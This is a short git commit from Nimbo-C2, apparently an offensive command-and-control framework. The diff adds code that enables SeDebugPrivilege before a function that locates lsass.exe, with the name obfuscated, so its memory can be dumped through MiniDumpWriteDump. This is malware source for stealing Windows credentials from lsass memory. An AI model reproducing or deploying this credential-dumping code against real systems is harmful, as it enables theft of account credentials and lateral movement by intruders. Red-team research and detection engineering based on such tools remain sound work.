also for lsass direct dumping

itaymigdal · Mar 6, 2023 · 21ba397 · 21ba397
1 parent 3738231
commit 21ba397
Showing 1 changed file with 4 additions and 0 deletions.
diff --git a/Nimbo-C2/agent/windows/utils/misc.nim b/Nimbo-C2/agent/windows/utils/misc.nim
@@ -1,4 +1,5 @@
 import helpers
+import priv
 import winim
 import nimprotect
 
@@ -15,6 +16,9 @@ proc MiniDumpWriteDump(
 
 proc dump_lsass_minidumpwritedump*(): bool =
     var is_success = false
+    # set debug privileges
+    if not set_privilege("SeDebugPrivilege"):
+        return is_success
     let pid = get_pid(protectString("lsass.exe"))
     if not bool(pid):
         return is_success